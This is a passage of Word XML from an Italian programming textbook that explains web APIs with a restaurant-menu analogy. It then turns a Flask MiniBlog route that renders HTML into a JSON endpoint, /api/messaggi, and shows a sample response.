      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">interfaccia di programmazione di un’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tradotto: è il modo con cui un programma offre i suoi servizi a un altro programma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’analogia più chiara è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">menù di un ristorante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando entri in un ristorante, tu (il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) non vai in cucina a prendere il cibo. Consulti il menù, scegli, ordini al cameriere. Il menù è l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">interfaccia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una lista pubblica e ordinata di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cose che puoi chiedere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cosa otterrai in cambio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La cucina, dietro le quinte, può funzionare in mille modi diversi (forno a legna o induzione, chef italiano o francese): tu non lo sai e non ti riguarda. Ti basta sapere che se ordini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">spaghetti al pomodoro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">arriveranno spaghetti al pomodoro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è esattamente questo: un menù di operazioni che un programma offre, con regole precise su come chiederle e cosa ricevere in risposta. Il programma che chiede è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; il programma che risponde è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Importante: API ≠ API web.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Esistono API ovunque nel software, non solo sul web. La libreria standard Python ha API (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.join()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un’API). Il sistema operativo ha API (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per aprire un file). Quando in questo capitolo diciamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intendiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: API esposte attraverso il protocollo HTTP, usabili da un client che si trova su una macchina diversa rispetto al server.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="147" w:name="api-web-vs-sito-web"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API web vs sito web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Sito web tradizionale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Risponde con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">HTML</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(con grafica, stili, layout)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Risponde con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">dati grezzi</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(di solito JSON)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pensato per essere letto da un</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">umano</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in un browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pensato per essere letto da un</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">programma</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gestisce navigazione, form, sessioni di un utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gestisce richieste di altre applicazioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esempio: la home page di un giornale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esempio: il servizio di previsioni meteo che il tuo smartphone interroga</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spesso lo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">stesso server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">offre sia un sito web che una o più API: per esempio il sito di una banca ha pagine HTML per i clienti che usano il browser, e API che la sua app per smartphone interroga. Le due cose convivono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkEnd w:id="148"/>
    <w:bookmarkStart w:id="149" w:name="X0412956b63312857aef41910578e6e4c917d6a9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.2 Da pagina HTML a API: cosa cambia per il server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Concretamente, cosa cambia nel codice quando trasformi un endpoint HTML in un endpoint API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ricordi questa funzione di MiniBlog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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messaggi.testo, utenti.username "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"FROM messaggi JOIN utenti ON messaggi.utente_id = utenti.id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    messaggi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()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&lt;h1&gt;MiniBlog&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or msg in messaggi %}&lt;p&gt;&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt;: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndfor %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, messaggi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messaggi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il server fa tre cose: (1) interroga il database, (2) costruisce HTML dai dati, (3) lo restituisce al browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della stessa funzione fa solo le prime due: interroga il database, restituisce i dati grezzi. La trasformazione in HTML, se serve, viene fatta dal client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/messaggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> api_messaggi():</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messaggi.testo, utenti.username "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"FROM messaggi JOIN utenti ON messaggi.utente_id = utenti.id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    righe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Trasformiamo le tuple in dizionari, così il JSON sarà più leggibile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    messaggi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: r[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"autore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: r[</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righe]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"messaggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: messaggi}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">percorso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comincia per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È una convenzione comunissima: separa visivamente le rotte HTML dalle rotte API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non c’è più HTML, né</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">render_template_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Restituiamo un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dizionario Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e Flask lo converte automaticamente in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un client che chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/messaggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">riceve in risposta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"messaggi"</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"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Ciao a tutti!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"autore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario"</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"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Buongiorno"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"autore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia"</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Esattamente gli stessi dati di prima — solo strutturati come testo macchina-leggibile invece che come HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkStart w:id="152" w:name="X4841d04e99fde5dfe7d4f8b6e61f7efeb4e112a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.3 JSON: il formato standard per i dati delle API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript Object Notation</w:t>
      </w:r>
      <w:r>
